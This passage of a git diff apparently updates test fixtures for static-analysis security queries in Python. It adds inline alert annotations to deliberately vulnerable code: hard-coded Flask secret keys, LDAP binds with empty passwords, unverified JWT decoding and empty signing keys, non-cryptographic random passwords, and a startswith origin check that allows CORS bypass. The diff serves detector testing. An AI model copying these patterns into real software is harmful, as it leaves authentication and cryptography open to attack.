app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | provenance | | | app_unsafe.py:4:1:4:9 | ControlFlowNode for aConstant | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | provenance | | 
@@ -32,13 +42,3 @@ nodes | config.py:18:18:18:52 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | config.py:18:43:18:51 | ControlFlowNode for aConstant | semmle.label | ControlFlowNode for aConstant | subpaths -#select -| app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. 
| app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | this constant String | -| config.py:12:18:12:26 | ControlFlowNode for aConstant | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:12:18:12:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | -| config.py:17:18:17:47 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:17:18:17:47 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | -| config.py:18:18:18:52 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:18:18:18:52 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.qlref b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.qlref index e77b304f62c4..535dfacbac40 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.qlref 
@@ -1 +1,2 @@ -experimental/Security/CWE-287-ConstantSecretKey/WebAppConstantSecretKey.ql +query: experimental/Security/CWE-287-ConstantSecretKey/WebAppConstantSecretKey.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_safe.py b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_safe.py index 442a23e2c3a1..3fcb38acbf93 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_safe.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_safe.py @@ -2,7 +2,7 @@ from flask_session import Session app = Flask(__name__) -app.config['SECRET_KEY'] = 'CHANGEME' +app.config['SECRET_KEY'] = 'CHANGEME' # $ Alert Session(app) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_unsafe.py b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_unsafe.py index 5aeeb6f7003b..c108dfd45611 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_unsafe.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_unsafe.py @@ -1,11 +1,11 @@ from flask import Flask, session app = Flask(__name__) -aConstant = 'CHANGEME1' -app.config['SECRET_KEY'] = aConstant -app.secret_key = aConstant -app.config.update(SECRET_KEY=aConstant) -app.config.from_mapping(SECRET_KEY=aConstant) +aConstant = 'CHANGEME1' # $ Source +app.config['SECRET_KEY'] = aConstant # $ Alert +app.secret_key = aConstant # $ Alert +app.config.update(SECRET_KEY=aConstant) # $ Alert +app.config.from_mapping(SECRET_KEY=aConstant) # $ Alert app.config.from_pyfile("config.py") app.config.from_object('config.Config') 
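Review bot: In app_safe.py the line `app.config['SECRET_KEY'] = 'CHANGEME' # $ Alert` records an expected alert in a file whose name says it is the safe variant. A hard-coded key is a real finding, so the annotation looks right, but the mismatch will confuse the next reader. A comment such as `# hard-coded placeholder key is still a constant secret; alert is intended` would settle it. If the result is instead considered a false positive, the annotation should be `# $ SPURIOUS: Alert` so the expectation documents that.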
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config.py b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config.py index 1a512c0d9f08..12dacb516e62 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config.py @@ -4,16 +4,16 @@ import random FLASK_DEBUG = True -aConstant = 'CHANGEME2' +aConstant = 'CHANGEME2' # $ Source class Config: SECRET_KEY = environ.get("envKey") - SECRET_KEY = aConstant + SECRET_KEY = aConstant # $ Alert SECRET_KEY = os.getenv('envKey') SECRET_KEY = os.environ.get('envKey') SECRET_KEY = os.environ.get('envKey', random.randint) SECRET_KEY = os.getenv('envKey', random.randint) - SECRET_KEY = os.getenv('envKey', aConstant) - SECRET_KEY = os.environ.get('envKey', aConstant) + SECRET_KEY = os.getenv('envKey', aConstant) # $ Alert + SECRET_KEY = os.environ.get('envKey', aConstant) # $ Alert SECRET_KEY = os.environ['envKey'] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config2.py b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config2.py index dc3508783e22..96b08fead125 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config2.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config2.py @@ -2,4 +2,4 @@ # General Config FLASK_DEBUG = True -SECRET_KEY = "CHANGEME5" +SECRET_KEY = "CHANGEME5" # $ Alert diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287/ImproperLdapAuth.qlref b/python/ql/test/experimental/query-tests/Security/CWE-287/ImproperLdapAuth.qlref index 9f5c6e4c43f4..edd5c17e2b18 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287/ImproperLdapAuth.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-287/ImproperLdapAuth.qlref 
@@ -1 +1,2 @@ -experimental/Security/CWE-287/ImproperLdapAuth.ql +query: experimental/Security/CWE-287/ImproperLdapAuth.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_2.py b/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_2.py index d37cc09cfd06..ef274090f91a 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_2.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_2.py @@ -16,7 +16,7 @@ def simple_bind_example(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.simple_bind('cn=root') + ldap_connection.simple_bind('cn=root') # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) @@ -30,7 +30,7 @@ def simple_bind_s_example(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.simple_bind_s('cn=root') + ldap_connection.simple_bind_s('cn=root') # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) @@ -44,7 +44,7 @@ def bind_s_example(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.bind_s('cn=root', None) + ldap_connection.bind_s('cn=root', None) # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) @app.route("/bind_s_example") 
@@ -57,7 +57,7 @@ def bind_s_example_kwargs(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.bind_s(who='cn=root', cred=None) + ldap_connection.bind_s(who='cn=root', cred=None) # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) @app.route("/bind_example") @@ -70,7 +70,7 @@ def bind_example(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.bind('cn=root', "") + ldap_connection.bind('cn=root', "") # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) @@ -84,7 +84,7 @@ def bind_example(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.bind(who='cn=root', cred="") + ldap_connection.bind(who='cn=root', cred="") # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_3.py b/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_3.py index 2500b4cadb6b..3b99754ec401 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_3.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_3.py @@ -16,7 +16,7 @@ def passwordNone(): search_filter = "(user={})".format(escape_filter_chars(request.args['search'])) srv = Server('servername', get_info=ALL) - conn = Connection(srv, 'user_dn', None) + conn = Connection(srv, 'user_dn', None) # $ Alert status, result, response, _ = conn.search(dn, search_filter) 
@@ -30,7 +30,7 @@ def passwordNoneKwargs():
 search_filter = "(user={})".format(escape_filter_chars(request.args['search']))
 srv = Server('servername', get_info=ALL)
- conn = Connection(srv, user='user_dn', password=None)
+ conn = Connection(srv, user='user_dn', password=None) # $ Alert
 status, result, response, _ = conn.search(dn, search_filter)
 @app.route("/passwordEmpty")
@@ -43,7 +43,7 @@ def passwordEmpty():
 search_filter = "(user={})".format(escape_filter_chars(request.args['search']))
 srv = Server('servername', get_info=ALL)
- conn = Connection(srv, user='user_dn', password="")
+ conn = Connection(srv, user='user_dn', password="") # $ Alert
 status, result, response, _ = conn.search(dn, search_filter)
@@ -57,7 +57,7 @@ def notPassword():
 search_filter = "(user={})".format(escape_filter_chars(request.args['search']))
 srv = Server('servername', get_info=ALL)
- conn = Connection(srv, user='user_dn')
+ conn = Connection(srv, user='user_dn') # $ Alert
 status, result, response, _ = conn.search(dn, search_filter)
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected
index 097e3580fb1d..8ffc7ac31d9b 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected
+++ b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected
@@ -1,3 +1,9 @@ +#select +| test.py:11:9:11:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:11:9:11:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:21:9:21:19 | ControlFlowNode for blob_client | test.py:15:27:15:71 | ControlFlowNode for Attribute() | test.py:21:9:21:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:31:9:31:19 | ControlFlowNode for blob_client | test.py:25:24:25:66 | ControlFlowNode for Attribute() | test.py:31:9:31:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:43:9:43:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:43:9:43:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:75:9:75:10 | ControlFlowNode for bc | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:75:9:75:10 | ControlFlowNode for bc | Unsafe usage of v1 version of Azure Storage client-side encryption | edges | test.py:3:1:3:3 | ControlFlowNode for BSC | test.py:7:19:7:21 | ControlFlowNode for BSC | provenance | | | test.py:3:1:3:3 | ControlFlowNode for BSC | test.py:35:19:35:21 | ControlFlowNode for BSC | provenance | | 
@@ -86,9 +92,3 @@ nodes | test.py:73:10:73:33 | ControlFlowNode for get_unsafe_blob_client() | semmle.label | ControlFlowNode for get_unsafe_blob_client() | | test.py:75:9:75:10 | ControlFlowNode for bc | semmle.label | ControlFlowNode for bc | subpaths -#select -| test.py:11:9:11:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:11:9:11:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:21:9:21:19 | ControlFlowNode for blob_client | test.py:15:27:15:71 | ControlFlowNode for Attribute() | test.py:21:9:21:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:31:9:31:19 | ControlFlowNode for blob_client | test.py:25:24:25:66 | ControlFlowNode for Attribute() | test.py:31:9:31:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:43:9:43:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:43:9:43:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:75:9:75:10 | ControlFlowNode for bc | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:75:9:75:10 | ControlFlowNode for bc | Unsafe usage of v1 version of Azure Storage client-side encryption |
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.qlref b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.qlref
index b737b32c8159..b5ed8a0d6364 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.qlref
+++ b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql
+query: experimental/Security/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/test.py b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/test.py
index 32fa60c61930..8cb7d2b7794d 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/test.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/test.py
@@ -1,6 +1,6 @@
 from azure.storage.blob import BlobServiceClient, ContainerClient, BlobClient
-BSC = BlobServiceClient.from_connection_string(...)
+BSC = BlobServiceClient.from_connection_string(...) # $ Source
 def unsafe():
 # does not set encryption_version to 2.0, default is unsafe
@@ -8,27 +8,27 @@ def unsafe():
 blob_client.require_encryption = True
 blob_client.key_encryption_key = ...
 with open("decryptedcontentfile.txt", "rb") as stream:
- blob_client.upload_blob(stream) # BAD
+ blob_client.upload_blob(stream) # BAD # $ Alert
 def unsafe_setting_on_blob_service_client():
- blob_service_client = BlobServiceClient.from_connection_string(...)
+ blob_service_client = BlobServiceClient.from_connection_string(...) # $ Source
 blob_service_client.require_encryption = True
 blob_service_client.key_encryption_key = ...
 blob_client = blob_service_client.get_blob_client(...)
 with open("decryptedcontentfile.txt", "rb") as stream:
- blob_client.upload_blob(stream)
+ blob_client.upload_blob(stream) # $ Alert
 def unsafe_setting_on_container_client():
- container_client = ContainerClient.from_connection_string(...)
+ container_client = ContainerClient.from_connection_string(...) # $ Source
 container_client.require_encryption = True
 container_client.key_encryption_key = ...
 blob_client = container_client.get_blob_client(...)
 with open("decryptedcontentfile.txt", "rb") as stream:
- blob_client.upload_blob(stream)
+ blob_client.upload_blob(stream) # $ Alert
 def potentially_unsafe(use_new_version=False):
@@ -40,7 +40,7 @@ def potentially_unsafe(use_new_version=False):
 blob_client.encryption_version = '2.0'
 with open("decryptedcontentfile.txt", "rb") as stream:
- blob_client.upload_blob(stream) # BAD
+ blob_client.upload_blob(stream) # BAD # $ Alert
 def safe():
@@ -72,7 +72,7 @@ def get_unsafe_blob_client():
 def unsafe_with_calls():
 bc = get_unsafe_blob_client()
 with open("decryptedcontentfile.txt", "rb") as stream:
- bc.upload_blob(stream) # BAD
+ bc.upload_blob(stream) # BAD # $ Alert
 def get_safe_blob_client():
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected
index 29ecd398a0af..da6e1c5aa1fd 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected
+++ b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected
@@ -1,6 +1,6 @@ +#select +| InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | Cryptographically insecure $@ in a security context. | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | random value | edges nodes | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths -#select -| InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | Cryptographically insecure $@ in a security context. | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | random value |
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.py b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.py
index 9f0439549672..ee94baf9eee1 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.py
@@ -2,4 +2,4 @@
 def generatePassword():
 # BAD: the random is not cryptographically secure
- return random.random()
+ return random.random() # $ Alert
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.qlref b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.qlref
index 447fc2cf6b25..84cbc2412d91 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.qlref
+++ b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-338/InsecureRandomness.ql
\ No newline at end of file
+query: experimental/Security/CWE-338/InsecureRandomness.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-346/Cors.py b/python/ql/test/experimental/query-tests/Security/CWE-346/Cors.py
index cc12e1273fbb..e01d99bde754 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-346/Cors.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-346/Cors.py
@@ -4,8 +4,8 @@ def bad():
 request = cherrypy.request
 validCors = "domain.com"
 if request.method in ['POST', 'PUT', 'PATCH', 'DELETE']:
- origin = request.headers.get('Origin', None)
- if origin.startswith(validCors):
+ origin = request.headers.get('Origin', None) # $ Source
+ if origin.startswith(validCors): # $ Alert
 print("Origin Valid")
 def good():
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected
index 32d807c6f6e5..5816701791cf 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected
+++ b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected
@@ -1,3 +1,5 @@ +#select +| Cors.py:8:12:8:17 | ControlFlowNode for origin | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:8:12:8:17 | ControlFlowNode for origin | Potentially incorrect string comparison which could lead to a CORS bypass. | edges | Cors.py:7:9:7:14 | ControlFlowNode for origin | Cors.py:8:12:8:17 | ControlFlowNode for origin | provenance | | | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:7:18:7:52 | ControlFlowNode for Attribute() | provenance | Config |
@@ -9,5 +11,3 @@ nodes | Cors.py:7:18:7:52 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | Cors.py:8:12:8:17 | ControlFlowNode for origin | semmle.label | ControlFlowNode for origin | subpaths -#select -| Cors.py:8:12:8:17 | ControlFlowNode for origin | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:8:12:8:17 | ControlFlowNode for origin | Potentially incorrect string comparison which could lead to a CORS bypass. |
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.qlref b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.qlref
index b652fd93088b..35c42c39e854 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.qlref
+++ b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-346/CorsBypass.ql
\ No newline at end of file
+query: experimental/Security/CWE-346/CorsBypass.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/JWTEmptyKeyOrAlgorithm.qlref b/python/ql/test/experimental/query-tests/Security/CWE-347/JWTEmptyKeyOrAlgorithm.qlref
index fe0d2ea00043..d225e37a0d38 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-347/JWTEmptyKeyOrAlgorithm.qlref
+++ b/python/ql/test/experimental/query-tests/Security/CWE-347/JWTEmptyKeyOrAlgorithm.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-347/JWTEmptyKeyOrAlgorithm.ql
+query: experimental/Security/CWE-347/JWTEmptyKeyOrAlgorithm.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.qlref b/python/ql/test/experimental/query-tests/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.qlref
index d289ff151f42..38402ddd457b 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.qlref
+++ b/python/ql/test/experimental/query-tests/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.ql
+query: experimental/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/authlib.py b/python/ql/test/experimental/query-tests/Security/CWE-347/authlib.py
index 2f7367897033..94eb4a38c875 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-347/authlib.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-347/authlib.py
@@ -8,8 +8,8 @@
 JsonWebToken().encode({"alg": "HS256"}, token, "key")
 # bad - empty key
-jwt.encode({"alg": "HS256"}, token, "")
-JsonWebToken().encode({"alg": "HS256"}, token, "")
+jwt.encode({"alg": "HS256"}, token, "") # $ Alert[py/jwt-empty-secret-or-algorithm]
+JsonWebToken().encode({"alg": "HS256"}, token, "") # $ Alert[py/jwt-empty-secret-or-algorithm]
 # Decoding
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/pyjwt.py b/python/ql/test/experimental/query-tests/Security/CWE-347/pyjwt.py
index 39892b33dcb9..c08375ef9f4f 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-347/pyjwt.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-347/pyjwt.py
@@ -7,11 +7,11 @@
 jwt.encode(token, key="key", algorithm="HS256")
 # bad - both key and algorithm set to None
-jwt.encode(token, None, None)
+jwt.encode(token, None, None) # $ Alert[py/jwt-empty-secret-or-algorithm]
 # bad - empty key
-jwt.encode(token, "", algorithm="HS256")
-jwt.encode(token, key="", algorithm="HS256")
+jwt.encode(token, "", algorithm="HS256") # $ Alert[py/jwt-empty-secret-or-algorithm]
+jwt.encode(token, key="", algorithm="HS256") # $ Alert[py/jwt-empty-secret-or-algorithm]
 # Decoding
@@ -19,8 +19,8 @@
 jwt.decode(token, "key", "HS256")
 # bad - unverified decoding
-jwt.decode(token, verify=False)
-jwt.decode(token, key, options={"verify_signature": False})
+jwt.decode(token, verify=False) # $ Alert[py/jwt-missing-verification]
+jwt.decode(token, key, options={"verify_signature": False}) # $ Alert[py/jwt-missing-verification]
 # good - verified decoding
 jwt.decode(token, verify=True)
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/python_jose.py b/python/ql/test/experimental/query-tests/Security/CWE-347/python_jose.py
index eeb050184d85..8c2bfe90879b 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-347/python_jose.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-347/python_jose.py
@@ -7,8 +7,8 @@
 jwt.encode(token, key="key", algorithm="HS256")
 # bad - empty key
-jwt.encode(token, "", algorithm="HS256")
-jwt.encode(token, key="", algorithm="HS256")
+jwt.encode(token, "", algorithm="HS256") # $ Alert[py/jwt-empty-secret-or-algorithm]
+jwt.encode(token, key="", algorithm="HS256") # $ Alert[py/jwt-empty-secret-or-algorithm]
 # Decoding
@@ -16,7 +16,7 @@
 jwt.decode(token, "key", "HS256")
 # bad - unverified decoding
-jwt.decode(token, key, options={"verify_signature": False})
+jwt.decode(token, key, options={"verify_signature": False}) # $ Alert[py/jwt-missing-verification]
 # good - verified decoding
 jwt.decode(token, key, options={"verify_signature": True})
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/python_jwt.py b/python/ql/test/experimental/query-tests/Security/CWE-347/python_jwt.py
index 42a3fc35f075..77e67b2dd904 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-347/python_jwt.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-347/python_jwt.py
@@ -11,4 +11,4 @@ def good(token):
 def bad(token):
- python_jwt.process_jwt(token)
+ python_jwt.process_jwt(token) # $ Alert[py/jwt-missing-verification]
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected
index 1d529f3b3ea0..69e893a6f42d 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected
+++ b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected
